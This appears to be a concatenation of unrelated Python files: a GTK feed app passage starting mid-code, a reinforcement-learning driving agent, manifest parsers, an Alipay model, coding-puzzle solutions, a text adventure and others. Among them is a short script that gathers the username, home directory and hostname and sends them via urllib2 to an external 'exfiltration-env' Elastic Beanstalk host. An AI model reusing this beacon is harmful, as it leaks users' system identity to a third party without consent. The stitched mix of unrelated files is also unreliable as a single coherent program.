# of whether it's been frozen
break
# fallback is to create a new FileMutatedFeedEvent
if not coalesced:
n = FileMutatedFeedEvent(evt.phase_name, self.fvm)
n.add_file_evt_chron_order(evt)
self.push_feed_event(n)
elif evt.__class__ == FileReadEvent:
# add a "read barrier" to prevent write coalescing
# over-optimizations
file_read_timestamps[evt.filename] = evt.timestamp
elif evt.__class__ == StatusUpdateEvent:
n = StatusUpdateFeedEvent(evt)
self.push_feed_event(n)
elif evt.__class__ == HappyFaceEvent:
n = HappyFaceFeedEvent(evt)
self.push_feed_event(n)
elif evt.__class__ == SadFaceEvent:
n = SadFaceFeedEvent(evt)
self.push_feed_event(n)
else:
print evt
assert False
# defer loading of thumnbnails until ALL DoodleFeedEvent instances
# have been processed, since that's the only way we can ensure that
# the proper versions of the files are loaded for the thumbnails
for d in new_doodle_feed_events:
d.load_thumbnail()
def push_feed_event(self, evt):
self.feed_events.append(evt)
# push new entries to the TOP of the feed
self.feed_vbox.pack_end(evt.get_widget(), expand=False, padding=6)
self.update_all_timestamps()
def update_all_timestamps(self):
for e in self.feed_events:
e.update_timestamp()
def post_button_clicked(self, widget):
buf = self.status_input.get_buffer()
status_str = buf.get_text(*buf.get_bounds())
if status_str and status_str != self.most_recent_status_str:
self.most_recent_status_str = status_str # to prevent accidental multiple-submits
n = StatusUpdateFeedEvent(StatusUpdateEvent(status_str,
datetime.datetime.now(),
self.cur_session))
self.push_feed_event(n)
n.save_to_db() # very important!!!
def happy_face_button_clicked(self, widget):
self.commit_handler(widget, True)
def sad_face_button_clicked(self, widget):
self.commit_handler(widget, False)
def commit_handler(self, widget, is_happy):
if is_happy:
state = 'happy'
else:
state = 'sad'
label = gtk.Label("What just made you %s?" % state)
ci = gtk.TextView()
ci.set_wrap_mode(gtk.WRAP_WORD)
ci.set_border_width(1)
ci.set_left_margin(3)
ci.set_right_margin(3)
ci.modify_bg(gtk.STATE_NORMAL, gtk.gdk.Color('#999999'))
ci.modify_font(pango.FontDescription("sans 10"))
sw = gtk.ScrolledWindow()
sw.set_policy(gtk.POLICY_NEVER, gtk.POLICY_AUTOMATIC)
sw.add(ci)
sw.set_size_request(350, 150)
dialog = gtk.Dialog("%s snapshot" % state,
None,
gtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT,
(gtk.STOCK_CANCEL, gtk.RESPONSE_REJECT,
gtk.STOCK_OK, gtk.RESPONSE_ACCEPT))
dialog.vbox.pack_start(label, expand=False, padding=8)
dialog.vbox.pack_start(sw, expand=False)
# move dialog to where the mouse pointer is
rootwin = widget.get_screen().get_root_window()
x, y, mods = rootwin.get_pointer()
dialog.move(x, y)
show_all_local_widgets(locals())
response = dialog.run()
# get text before destroying the dialog
buf = ci.get_buffer()
msg_str = buf.get_text(*buf.get_bounds())
dialog.destroy() # destroy the dialog first so it doesn't show up in screenshot
if response == gtk.RESPONSE_ACCEPT: # 'OK' button pressed
# don't allow empty commit messages
if msg_str:
self.push_commit_event(msg_str, is_happy)
def push_commit_event(self, msg_str, is_happy):
now = get_ms_since_epoch()
now_dt = encode_datetime(now)
if is_happy:
prefix = 'happy'
else:
prefix = 'sad'
output_filename = os.path.join(SCREENSHOTS_DIR, 'screenshot-%s.%d.png' % (prefix, now))
save_screenshot(output_filename)
if is_happy:
n = HappyFaceFeedEvent(HappyFaceEvent(msg_str, now_dt, self.cur_session, output_filename))
else:
n = SadFaceFeedEvent(SadFaceEvent(msg_str, now_dt, self.cur_session, output_filename))
bff.push_feed_event(n)
n.save_to_db() # very important!!!
def timer_interrupt(self):
# update BEFORE polling for events
db_last_updated_time = None
e = self.db.session_status.find_one({'_id': self.cur_session})
if e:
db_last_updated_time = e['last_updated_time']
if db_last_updated_time != self.cur_db_last_updated_time:
if self.cur_db_last_updated_time:
assert db_last_updated_time > self.cur_db_last_updated_time
self.prev_db_last_updated_time = self.cur_db_last_updated_time
self.cur_db_last_updated_time = db_last_updated_time
#print 'Prev:', self.prev_db_last_updated_time
#print 'Cur: ', self.cur_db_last_updated_time
#print
self.poll_for_all_event_updates()
self.update_all_timestamps()
# now we've presumably pulled all MongoDB events up to
# self.prev_db_last_updated_time, so push it forward:
self.prev_db_last_updated_time = self.cur_db_last_updated_time
return True # to keep timer interrupts firing
def main(self):
gtk.main()
def exit_handler():
global bff
bff.fvm.memoize_checkpoints()
bff.fvm.unmount_all_snapshots()
if __name__ == "__main__":
if len(sys.argv) > 1:
cur_session = sys.argv[1]
else:
# if you don't pass in an argument, then use the CONTENTS of
# /var/log/burrito/current-session as the session tag
cur_session = os.readlink('/var/log/burrito/current-session').strip()
assert cur_session[-1] != '/' # don't have a weird trailing slash!
SCREENSHOTS_DIR = '/var/log/burrito/%s/' % cur_session
assert os.path.isdir(SCREENSHOTS_DIR)
# have tooltips pop up fairly quickly
gtk.settings_get_default().set_long_property('gtk-tooltip-timeout', 300, '')
bff = BurritoFeed(cur_session)
atexit.register(exit_handler)
signal(SIGTERM, lambda signum,frame: exit(1)) # trigger the atexit function to run
bff.timer_interrupt() # call it once on start-up
gobject.timeout_add(5000, bff.timer_interrupt)
bff.main() # infinite loop!!!
|
import random
import numpy as np
from environment import Agent, Environment
from planner import RoutePlanner
from simulator import Simulator
n_trials = 200 # Sets number of trials
class LearningAgent(Agent):
"""An agent that learns to drive in the smartcab world."""
def __init__(self, env):
super(LearningAgent, self).__init__(env) # sets self.env = env,
# state = None, next_waypoint = None,
# and a default color
self.color = 'red' # override color
self.planner = RoutePlanner(self.env,self) # simple route planner to
# get next waypoint
# TODO: Initialize any additional variables here
self.Q_table = {}
self.alpha = 0.2 # Tune alpha for use in Bellman Equation
self.gamma = 0.2 # Tune gamma for use in Bellman Equation
self.failures = 0
self.illegal_actions = 0
self.trial = 0
self.reward = 0
def reset(self, destination=None):
self.planner.route_to(destination)
# TODO: Prepare for a new trip; reset any variables here, if required
self.trial += 1
self.reward = 0
def update(self, t):
# Gather inputs
self.next_waypoint = self.planner.next_waypoint() # from route planner,
# also displayed by simulator
inputs = self.env.sense(self)
deadline = self.env.get_deadline(self)
if self.trial > (float(n_trials / 2)):
if deadline == 0: # add up failures for performance metric
self.failures += 1
epsilon = float(1) / self.trial # epsilon decays over time so
# it is more exploratory at the beginning and is less so later on
print "Epsilon:", epsilon
# TODO: Update state
self.state = (inputs['light'], inputs['oncoming'], inputs['left'],
inputs['right'], self.next_waypoint)
print "State:", self.state
encountered_states = set()
encountered_states.add(self.state)
# TODO: Select action according to your policy
if self.state in encountered_states:
if random.random() >= epsilon or self.trial > (float(n_trials) / 2):
# choose best action if random number is greater than
# epsilon, unless after trial 100
options = {action: self.Q_table.get((self.state, action), 0) for
action in self.env.valid_actions} # get the
# options for each action for the given state from the
# Q_table or impute 0
print "Possible Actions:", options
max_action = [action for action in self.env.valid_actions if
options[action] == max(options.values())]
print "Best Action(s):", max_action
# At start, there may be several options with equal scores.
# Random option is then selected.
action = max_action[0] # If a tie, an action of 'None' will get
# the first choice as we are prioritizing safety
else: # choose random option
action = random.choice(self.env.valid_actions)
print "Random Option Chosen!"
else:
action = random.choice(self.env.valid_actions)
print "Random Option Chosen!"
# Execute action and get reward
reward = self.env.act(self, action)
if self.trial >= float(n_trials) / 2:
if reward == -1.0 or reward == 11.0:
# illegal moves can return only those scores
self.illegal_actions += 1
# TODO: Learn policy based on state, action, reward
# Bellman Equation: Q(s, a) = Q(s, a) + alpha(reward + gamma * maxQ(
# s+1, a) - Q(s, a))
# Learning Policy
old_value = self.Q_table.get((self.state, action), 0)
next_state = self.env.sense(self)
next_waypoint = self.planner.next_waypoint()
state_prime = (next_state['light'], next_state['oncoming'], next_state[
'right'], next_state['left'], next_waypoint)
utility_of_next_state = self.Q_table.get((state_prime, action), 0)
utility_of_state = reward + self.gamma * utility_of_next_state - \
old_value
# Q-table Gets Updated
self.Q_table[(self.state, action)] = self.Q_table.get((self.state,
action),
0) + self.alpha\
* utility_of_state
print "LearningAgent.update(): deadline = {}, inputs = {}, action = {" \
"}, reward = {}".format(deadline, inputs, action, reward)
print
def performance(self):
print "Destination Reached Rate = {}".format(float((n_trials / 2) -
self.failures) /
(n_trials / 2))
print "Illegal Moves per Trial = {}".format(float(
self.illegal_actions) / (n_trials / 2))
def run():
"""Run the agent for a finite number of trials."""
# Set up environment and agent
e = Environment() # create environment (also adds some dummy traffic)
a = e.create_agent(LearningAgent) # create agent
e.set_primary_agent(a, enforce_deadline=True) # specify agent to track
# NOTE: You can set enforce_deadline=False while debugging to allow
# longer trials
# Now simulate it
sim = Simulator(e, update_delay=0, display=False) # create simulator (
# uses pygame when display=True, if available)
# NOTE: To speed up simulation, reduce update_delay and/or set display=False
sim.run(n_trials=n_trials) # run for a specified number of trials
# NOTE: To quit midway, press Esc or close pygame window, or hit Ctrl+C
# on the command-line
a.performance()
if __name__ == '__main__':
run() |
destinations = [
"Space Needle",
"Crater Lake",
"Golden Gate Bridge",
"Yosemite National Park",
"Las Vegas, Nevada",
"Grand Canyon National Park",
"Aspen, Colorado",
"Mount Rushmore",
"Yellowstone National Park",
"Sandpoint, Idaho",
"Banff National Park",
"Capilano Suspension Bridge",
]
import geocoder
# Declare destinations list here.
# Loop through each destination.
for point in destinations:
g = geocoder.arcgis(point)
print(point, " is located at ", g.latlng)
# Get the lat-long coordinates from `geocoder.arcgis`.
# Print out the place name and the coordinates. |
# -*- coding=utf-8 -*-
# author: yanyang.xie@thistech.com
import os
import re
class ManifestPaser(object):
def __init__(self, manifest, request_url, psn_tag=None, ad_tag=None, sequence_tag='#EXT-X-MEDIA-SEQUENCE', asset_id_tag='vod_', provider_tag = 'ProviderId'):
self.manifest = manifest
self.request_url = request_url
self.psn_tag = psn_tag
self.ad_tag = ad_tag
self.sequence_tag = sequence_tag
self.asset_id_tag = asset_id_tag
self.provider_tag = provider_tag
self.ad_ts_number = 0
self.ad_pre_number = 0
self.ad_post_number = 0
self.ad_mid_number = 0
self.ad_mid_position_list = []
self.ad_url_list=[]
self.sequence_number = 0
self.has_asset_id = False
self.entertainment_ts_number = 0
self.psn_tracking_position_id_dict = {}
def parse(self):
self.asset_id = self.extract_asset_id(self.request_url)
if self.asset_id is None:
self.has_asset_id = False
manifest_list = self.manifest.split('\n')
entertainment_ts_index, tmp_index = 0, 0
for line in manifest_list:
line = line.strip()
if line == '':
continue
if line.find(self.sequence_tag) >= 0:
self.sequence_number = int(line.rsplit(':')[-1].strip('\r'))
continue
if self.has_asset_id is not True and line.find(self.asset_id) > 0:
self.has_asset_id = True
if self.psn_tag is not None and line.find(self.psn_tag) > -1:
trackingId = self.extract_psn_tracking_id(line)
if trackingId != '':
self.psn_tracking_position_id_dict[entertainment_ts_index] = trackingId
elif line.find('.ts') > 0:
if line.find(self.ad_tag) > -1:
self.ad_ts_number += 1
self.ad_url_list.append(line)
if entertainment_ts_index < 1:
# not found entertainment ts, should be preroll ad
self.ad_pre_number += 1
else:
# mid or post roll ad. Record ad ts number and started postion
# 暂时不知道,这个是midroll还是postroll的ad。先假定其是postroll的
tmp_index = entertainment_ts_index
self.ad_post_number += 1
elif line.find(self.asset_id_tag) > -1:
self.entertainment_ts_number += 1
entertainment_ts_index += 1
if self.ad_post_number > 0:
# 当在ad后又遇见entertainment的ts,证明之前记录的是mid roll的ad。此时记录midroll的postion和number。同时将postroll的清零
self.ad_mid_position_list.append(tmp_index)
self.ad_mid_number += self.ad_post_number
self.ad_post_number = 0
def extract_psn_tracking_id(self, content):
'''Get PSN tracking id'''
p = r'\w*\W*ID=(.*),DURATION[\.\n]*'
psn_info = re.findall(p, content)
if psn_info is not None and len(psn_info) > 0:
return psn_info[0]
'''
def extract_asset_id(self, url):
flag = '/.*(%s.*)/' % (self.asset_id_tag)
p = r'\w*\W*%s[\.\n]*' % (flag)
t_info = re.findall(p, url)
if t_info is not None and len(t_info) > 0:
return t_info[0].split('/')[0]
else:
return None
'''
def extract_asset_id(self, url):
#re.findall(r'.*ProviderId=(.*?)\&.*', url)
p = r'.*%s=(.*?)\&.*' %(self.provider_tag)
t_info = re.findall(p, url)
if t_info is not None and len(t_info) > 0:
return t_info[0].split('/')[0]
else:
return None
class LinearManifestChecker(ManifestPaser):
def __init__(self, manifest, request_url, psn_tag=None, ad_tag=None, sequence_tag='#EXT-X-MEDIA-SEQUENCE', asset_id_tag='vod_'):
super(LinearManifestChecker, self).__init__(manifest, request_url, psn_tag, ad_tag, sequence_tag, asset_id_tag)
self.parse()
self.ad_data_transform()
def ad_data_transform(self):
self.ad_in_first_postion = True if self.ad_pre_number > 0 else False
class CdvrManifestChecker(ManifestPaser):
def __init__(self, manifest, request_url, psn_tag=None, ad_tag=None, sequence_tag='#EXT-X-MEDIA-SEQUENCE', asset_id_tag='vod_'):
super(CdvrManifestChecker, self).__init__(manifest, request_url, psn_tag, ad_tag, sequence_tag, asset_id_tag)
self.parse()
self.generate_ad_position_list()
def generate_ad_position_list(self):
if self.ad_pre_number > 0:
self.ad_mid_position_list.insert(0, 0)
if self.ad_post_number > 0:
self.ad_mid_position_list.append(self.entertainment_ts_number)
class VODManifestChecker(ManifestPaser):
def __init__(self, manifest, request_url, psn_tag=None, ad_tag=None, sequence_tag='#EXT-X-MEDIA-SEQUENCE', asset_id_tag='vod_'):
super(VODManifestChecker, self).__init__(manifest, request_url, psn_tag, ad_tag, sequence_tag, asset_id_tag)
self.parse()
self.error = None
def check(self, media_sequence_number, entertainment_ts_number, end_list_tag, drm_tag,
ad_mid_position_list, ad_pre_number, ad_mid_number, ad_post_number,
iframe_tag='IsIFrame=true', ad_iframe_tag='ad_iframe', audio_tag='IsAudio=true', ad_audio_tag='ad_audio'):
message = None
while True:
if self.has_asset_id is not True:
message = 'Not found same asset id from manifest. url:%s' % (self.request_url)
break
elif self.sequence_number != media_sequence_number:
message = 'Manifest media sequence number is %s, not the same as expected number %s' % (self.sequence_number, media_sequence_number)
break
elif self.entertainment_ts_number != entertainment_ts_number:
message = 'Manifest entertainment ts number is %s, not the same as expected number %s' % (self.entertainment_ts_number, entertainment_ts_number)
break
elif self.manifest.find(end_list_tag) < 0:
message = 'Manifest has not end list tag %s' % (end_list_tag)
break
elif self.manifest.find(drm_tag) < 0:
message = 'Manifest has not drm tag %s' % (drm_tag)
break
elif self.ad_pre_number != ad_pre_number:
message = 'Manifest ad pre-roll number is %s, not the same as expected number %s' % (self.ad_pre_number, ad_pre_number)
break
elif self.ad_mid_position_list != ad_mid_position_list:
message = 'Manifest ad mid-roll positions is %s, not the same as expected %s' % (self.ad_mid_position_list, ad_mid_position_list)
break
elif self.ad_mid_number != ad_mid_number:
message = 'Manifest ad mid-roll position is right, but number is %s, not the same as expected number %s' % (self.ad_mid_number, ad_mid_number)
break
elif self.ad_post_number != ad_post_number:
message = 'Manifest ad post-roll number is %s, not the same as expected number %s' % (self.ad_post_number, ad_post_number)
break
elif self.request_url.find(iframe_tag) > 0 and self.manifest.find(ad_iframe_tag) < 0:
message = 'Manifest has not ad iframe tag %s, but %s is found in url %s' % (ad_iframe_tag, iframe_tag, self.request_url)
break
elif self.request_url.find(audio_tag) > 0 and self.manifest.find(ad_audio_tag) < 0:
message = 'Manifest has not ad audio tag \'%s\', but %s is found in url %s' % (ad_audio_tag, audio_tag, self.request_url)
break
else:
break
self.error = message
return self.error
if __name__ == '__main__':
request_url = 'http://mm.vod.comcast.net:80/origin/playlists/vod_test_7975/king/99999999/vod_test_7975_med_3.m3u8?&IndexName=index.m3u8&BitRelLength=176&ProviderId=vod_test_7975&AssetId=abcd1234567890123456&StreamType=VOD_T6&DeviceId=X1&PartnerId=hello&dtz=2015-04-09T18:39:05-05:00&sid=VEX_27a749ad-b7af-4f10-ac9f-ebcf2f6ada27&ResourceId=4cb23d3428c74396cddf92159780bf72&BW=2050300&MinBW=2050100&IsIFrame=false&IsAudio=false&HasIFrame=true&HasAudio=true&HasSAP=false&IsSAP=false&CODEC=AAC'
with open(os.path.dirname(os.path.realpath(__file__)) + '/../vod/fake/bitrate-fake-response.txt') as f:
manifest = f.read()
checker = VODManifestChecker(manifest, request_url, psn_tag=None, ad_tag='ad', asset_id_tag='vod_')
print checker.check(18, 900, '#EXT-X-ENDLIST', 'EXT-X-FAXS-CM', [225, 450, 675], 10, 30, 10)
|
import os
home_dir = os.system("pytest test/configuration/testConfiguration.py test/extractors/testCsvExtractor.py "
"test/extractors/testSpiderWebScrapperExtractor.py ")
|
__author__ = 'svankiE'
from clew.core.model import Event
from clew.search.index_builder import IndexBuilder
if __name__ == '__main__':
print "Building object index..."
builder = IndexBuilder()
events = Event.query.all()
if events:
# for now, building clean, shiny indexes.
builder.build_index(events, clean=True)
print "Done."
else:
print "No events to be added." |
from unittest import TestCase
from jira.Objects import StatusObject
class TestStatusObject(TestCase):
def test_properties(self):
item = StatusObject(
ident='ident1',
name='display_name1'
)
self.assertEqual('ident1', item.ident)
self.assertEqual('display_name1', item.name)
|
from django.contrib import admin
from accounts.models import ApiSecretToken
admin.site.register(ApiSecretToken)
|
import numpy as np
from .optimizer import Optimizer
class RMSprop(Optimizer):
"""TODO: RMSprop docs"""
def __init__(self, lr, momentum=0.9):
super().__init__()
self.lr = lr
self.momentum = momentum
self.cache = {}
def step(self, model):
for i, (param, grad) in enumerate(model.parameters()):
if i not in self.cache:
self.cache.update({i: np.zeros(grad.shape)})
self.cache[i] = (self.momentum * self.cache[i] + (1.0 - self.momentum) * grad**2)
param -= self.lr * grad / (np.sqrt(self.cache[i]) + 1e-8) |
import urllib2
import urllib
import getpass
import socket
import os
user = getpass.getuser()
home = os.environ['HOME']
host = socket.gethostname()
info = {"user": user, "home": home, "host": host}
message = ("Hello, I am {user}, my things are in {home}." +
" Come find me on {host}!").format(**info)
args = {'msg': message }
data = urllib.urlencode(args)
req = urllib2.urlopen('http://exfiltration-env.ug5fvfwjza.us-west-2.elasticbeanstalk.com/log?' + data)
response = req.read()
|
"""
Input Format
The first line of input contains the original string. The next line contains the substring.
Testing things
Output Format
Output the integer number indicating the total number of occurrences of the substring in the original string.
Sample Input
ABCDCDC
CDC
Sample Output
2
"""
str,sub,count=raw_input(),raw_input(),0
for i in range(len(str)):
if str[i:i+len(sub)] == sub:
count+=1
print count
|
def min_path_sum(matrix):
row_length = len(matrix)
col_length = len(matrix[0])
dp = [[0 for _ in range(col_length)] for _ in range(row_length)]
# fill first row and col..
dp[0][0] = matrix[0][0]
for row in range(1, row_length):
dp[row][0] = matrix[row][0] + dp[row-1][0]
for col in range(1, col_length):
dp[0][col] = matrix[0][col] + dp[0][col-1]
for row in range(1, row_length):
for col in range(1, col_length):
dp[row][col] = min(dp[row-1][col], dp[row]
[col-1]) + matrix[row][col]
return dp[-1][-1]
print(min_path_sum([[1, 3, 1], [1, 5, 1], [4, 2, 1]]))
print(min_path_sum([[1, 2, 3], [4, 5, 6]]))
|
"""
Given a string, you need to reverse the order of characters in each word within a sentence while still preserving whitespace and initial word order.
Example 1:
Input: "Let's take LeetCode contest"
Output: "s'teL ekat edoCteeL tsetnoc"
Note: In the string, each word is separated by single space and there will not be any extra space in the string.
"""
def reverseString(s):
fstr = ""
bstr = ""
mstr = ""
n = len(s)
for i in range(0, n // 2):
fstr = s[i] + fstr
bstr = bstr + s[n - 1 - i]
if n % 2 != 0:
mstr = s[n // 2 + 1]
return bstr + mstr + fstr
def reverseWords(s):
"""
:type s: str
:rtype: str
"""
wlist = s.split(' ')
max = len(wlist)
finalstr = ""
j = 0
for i in wlist:
finalstr = finalstr + reverseString(i) + ("" if (j == (max - 1)) else " ")
j += 1
return finalstr
data = "Let's take LeetCode contest"
print (data)
print (reverseWords(data))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class DataItem(object):
def __init__(self):
self._biz_trace_id = None
self._ext_res_field = None
self._highlight_summary = None
self._highlight_title = None
self._id = None
self._images = None
self._item_total_count = None
self._score = None
self._sequence = None
self._summary = None
self._title = None
self._trace_id = None
@property
def biz_trace_id(self):
return self._biz_trace_id
@biz_trace_id.setter
def biz_trace_id(self, value):
self._biz_trace_id = value
@property
def ext_res_field(self):
return self._ext_res_field
@ext_res_field.setter
def ext_res_field(self, value):
if isinstance(value, list):
self._ext_res_field = list()
for i in value:
self._ext_res_field.append(i)
@property
def highlight_summary(self):
return self._highlight_summary
@highlight_summary.setter
def highlight_summary(self, value):
self._highlight_summary = value
@property
def highlight_title(self):
return self._highlight_title
@highlight_title.setter
def highlight_title(self, value):
self._highlight_title = value
@property
def id(self):
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def images(self):
return self._images
@images.setter
def images(self, value):
if isinstance(value, list):
self._images = list()
for i in value:
self._images.append(i)
@property
def item_total_count(self):
return self._item_total_count
@item_total_count.setter
def item_total_count(self, value):
self._item_total_count = value
@property
def score(self):
return self._score
@score.setter
def score(self, value):
self._score = value
@property
def sequence(self):
return self._sequence
@sequence.setter
def sequence(self, value):
self._sequence = value
@property
def summary(self):
return self._summary
@summary.setter
def summary(self, value):
self._summary = value
@property
def title(self):
return self._title
@title.setter
def title(self, value):
self._title = value
@property
def trace_id(self):
return self._trace_id
@trace_id.setter
def trace_id(self, value):
self._trace_id = value
def to_alipay_dict(self):
params = dict()
if self.biz_trace_id:
if hasattr(self.biz_trace_id, 'to_alipay_dict'):
params['biz_trace_id'] = self.biz_trace_id.to_alipay_dict()
else:
params['biz_trace_id'] = self.biz_trace_id
if self.ext_res_field:
if isinstance(self.ext_res_field, list):
for i in range(0, len(self.ext_res_field)):
element = self.ext_res_field[i]
if hasattr(element, 'to_alipay_dict'):
self.ext_res_field[i] = element.to_alipay_dict()
if hasattr(self.ext_res_field, 'to_alipay_dict'):
params['ext_res_field'] = self.ext_res_field.to_alipay_dict()
else:
params['ext_res_field'] = self.ext_res_field
if self.highlight_summary:
if hasattr(self.highlight_summary, 'to_alipay_dict'):
params['highlight_summary'] = self.highlight_summary.to_alipay_dict()
else:
params['highlight_summary'] = self.highlight_summary
if self.highlight_title:
if hasattr(self.highlight_title, 'to_alipay_dict'):
params['highlight_title'] = self.highlight_title.to_alipay_dict()
else:
params['highlight_title'] = self.highlight_title
if self.id:
if hasattr(self.id, 'to_alipay_dict'):
params['id'] = self.id.to_alipay_dict()
else:
params['id'] = self.id
if self.images:
if isinstance(self.images, list):
for i in range(0, len(self.images)):
element = self.images[i]
if hasattr(element, 'to_alipay_dict'):
self.images[i] = element.to_alipay_dict()
if hasattr(self.images, 'to_alipay_dict'):
params['images'] = self.images.to_alipay_dict()
else:
params['images'] = self.images
if self.item_total_count:
if hasattr(self.item_total_count, 'to_alipay_dict'):
params['item_total_count'] = self.item_total_count.to_alipay_dict()
else:
params['item_total_count'] = self.item_total_count
if self.score:
if hasattr(self.score, 'to_alipay_dict'):
params['score'] = self.score.to_alipay_dict()
else:
params['score'] = self.score
if self.sequence:
if hasattr(self.sequence, 'to_alipay_dict'):
params['sequence'] = self.sequence.to_alipay_dict()
else:
params['sequence'] = self.sequence
if self.summary:
if hasattr(self.summary, 'to_alipay_dict'):
params['summary'] = self.summary.to_alipay_dict()
else:
params['summary'] = self.summary
if self.title:
if hasattr(self.title, 'to_alipay_dict'):
params['title'] = self.title.to_alipay_dict()
else:
params['title'] = self.title
if self.trace_id:
if hasattr(self.trace_id, 'to_alipay_dict'):
params['trace_id'] = self.trace_id.to_alipay_dict()
else:
params['trace_id'] = self.trace_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = DataItem()
if 'biz_trace_id' in d:
o.biz_trace_id = d['biz_trace_id']
if 'ext_res_field' in d:
o.ext_res_field = d['ext_res_field']
if 'highlight_summary' in d:
o.highlight_summary = d['highlight_summary']
if 'highlight_title' in d:
o.highlight_title = d['highlight_title']
if 'id' in d:
o.id = d['id']
if 'images' in d:
o.images = d['images']
if 'item_total_count' in d:
o.item_total_count = d['item_total_count']
if 'score' in d:
o.score = d['score']
if 'sequence' in d:
o.sequence = d['sequence']
if 'summary' in d:
o.summary = d['summary']
if 'title' in d:
o.title = d['title']
if 'trace_id' in d:
o.trace_id = d['trace_id']
return o
|
#!/usr/bin/env python
PACKAGE = "ros_basics_exercise"
from dynamic_reconfigure.parameter_generator_catkin import *
gen = ParameterGenerator()
mode_enum = gen.enum([gen.const("Obstacle_Avoidance", int_t, 0, "run with obstacle avoidance"),
gen.const("Test", int_t, 1, "run for test")], "An enum to set mode")
gen.add("mode", int_t, 0, "A size parameter which is edited via an enum", 0, 0, 1, edit_method=mode_enum)
gen.add("W_MAX", double_t, 0, "Max value of rotation speed", 3.14, 0, 8.)
gen.add("V_MAX", double_t, 0, "Max value of translation speed", 0.05, 0, 0.4)
gen.add("W_KP", double_t, 0, "KP of rotation PID", 3.0, 0, 5)
gen.add("W_KI", double_t, 0, "KI of rotation PID", 0.0, 0, 1)
gen.add("W_KD", double_t, 0, "KD of rotation PID", 0.0, 0, 1)
gen.add("V_KP", double_t, 0, "KP of translation PID", 2.0, 0, 5)
gen.add("V_KI", double_t, 0, "KI of translation PID", 0.0, 0, 1)
gen.add("V_KD", double_t, 0, "KD of translation PID", 0.0, 0, 1)
gen.add("test_x", double_t, 0, "test target in x", 0.0, -0.4, 0.4)
gen.add("test_y", double_t, 0, "test target in y", 0.0, -0.2, 0.2)
gen.add("test_yaw",double_t, 0, "test target in yaw", 0.0, -3.15, 3.15)
gen.add("start_test", bool_t, 0, "start flag for calibration test", False)
# package, node, name prefix: `<name>Config.h` or `<name>Config.py`
exit(gen.generate(PACKAGE, "ros_basics_exercise", "ThymioController"))
|
# -*- coding: utf-8 -*-
from datetime import time
from datetime import timedelta
from datetime import datetime
#Strings player inputs
WAIT = "Wait"
CLIMB = "Climb"
CHECK = "Check"
ROLL = "Roll"
#Strings world situations
ALIVE = "You are alive"
#Strings narrator outputs
#Initialization of variables
player_available_verbs = [WAIT, CLIMB, CHECK] #dynamic verbs available for player.
player_situation = [ALIVE] #dynamic state of player/world
current_time = datetime(2020, 4, 4, 12, 00) #should move remaining (below) variables into datastructure
percent_up_mountain = 0 #out of 100
player_energy = 100
player_health = 100
turn_counter = 0
# World actions
def adjust_player_energy(theEnergyAmount):
global player_energy
player_energy = player_energy + theEnergyAmount
if player_energy > 100:
player_energy = 100
if player_energy <= 0:
health_rollover = player_energy * -1
adjust_player_health(-health_rollover)
player_energy = 0
print("You feel exhausted.")
return
def adjust_player_health(theHealthAmount):
global player_health
player_health = player_health + theHealthAmount
if(theHealthAmount < 0):
print("It hurts")
if player_health > 100:
player_health = 100
return
def advance_time_by_minutes(theTimeAmount):
global current_time
current_time = current_time + timedelta(minutes=theTimeAmount)
return
def advance_world():
return
# Narrator actions
def check_for_win(thePercent):
if thePercent >= 100:
thePercent = 100
print("You've made it up the mountain. Now you are stuck.")
return
def check_for_still_alive(theCurrentHealth):
if theCurrentHealth > 0:
return True
else:
return False
def process_player_input(theInput):
print("\nYou attempt to " + theInput +":")
if (theInput in player_available_verbs) == False:
print("but you spelled something wrong.")
return False
return True #Input was good
def describe_situation(theSituationList):
print(*theSituationList, sep = ", ", end=".\n")
return
def list_verbs(theVerbs):
print(*theVerbs, sep = "\n")
return
# Player verbs
def player_wait():
print("Some time passes.")
advance_time_by_minutes(120)
adjust_player_energy(30)
adjust_player_health(7)
return
def player_climb_mountain():
print("You make some progress climbing.")
advance_time_by_minutes(120)
adjust_player_energy(-30)
global percent_up_mountain
percent_up_mountain = percent_up_mountain + 10
return
def player_check(): #This would be an iterator over player stats structure
print("The time is: " + str(current_time.time()))
print("Your energy is: " + str(player_energy))
print("Your health is: " + str(player_health))
print("You are " + str(percent_up_mountain) + "% up the mountain")
return
# Verb function list
verbs = {
CLIMB : player_climb_mountain,
WAIT : player_wait,
CHECK : player_check
}
# System actions
def process_action(theInput):
do_verb = verbs[theInput] #potential arbitrary method exec?
do_verb()
return
# Main game loop
# Method calls are prepended with manager
running = True
while running:
describe_situation(player_situation) # narrator
print("You can:\n")
list_verbs(player_available_verbs) # narrator
player_input = input ("\nWhat do you do? \n>")
player_input = player_input.capitalize()
do_action = process_player_input(player_input)
if do_action:
process_action(player_input) # system
advance_world() # world
check_for_win(percent_up_mountain) # narrator
running = check_for_still_alive(player_health) # narrator
turn_counter = turn_counter + 1
print("----------="+ str(turn_counter) +"=----------")
print("----------=You=----------")
print("----------=Are=----------")
print(" ---------=Dead=---------") |
'''
소수 찾기 코드
가장 기본적인 내용만을 사용한 파이썬 코드
(1과 자기 자신의 수 외의 수로 나눠지는 경우 소수가 아님을 활용하여
입력된 특정한 숫자 하나가 소수인지 아닌지 판별하는 단순한 코드)
'''
def FindPrime(x):
for i in range(2, x):
if(x % i == 0):
return False
return True
print(FindPrime(67))
|
import eng
class Bar:
name = 'Bar'
visited = False
visible = False
aliases = []
descriptions = {'shortDesc': "You're in the bar again. People are still enjoying conversation and drinks. There are exits to the south and west, and a door to the east leading outside. ",
'longDesc': "You've found a bar. " \
"The bar has the look of an old London upscale pub with a long marble counter. " \
"There are a few people in the room enjoying themselves and a bartender behind the counter. " \
"At the bar you see a Catholic Priest. Once you're done here, you can take west or south exits, " \
"or a door to the east that leads outside. "}
doors = {'west': 'ballroomBarDoor', 'east': 'barGardensDoor', 'south': 'barGalleryDoor'}
items = ['Catholic Priest', 'bartender', 'counter', 'bone key']
properties = {'initialized': False}
def _printShortDesc(self):
return self.descriptions['shortDesc']
def _printLongDesc(self):
if self.properties['initialized'] == False:
self.properties['initialized'] = True
return self.descriptions['longDesc']
def enterRoom(self):
if (self.visited == True):
return self._printShortDesc()
else:
self.visited = True
gardens = eng.getRoomByName('Gardens')
gardens.visible = True # Bar description talks about outside, so it should be labeled visible
return self._printLongDesc()
# Per game requirements, look should reprint long description
def look(self):
return self._printLongDesc()
bar = Bar()
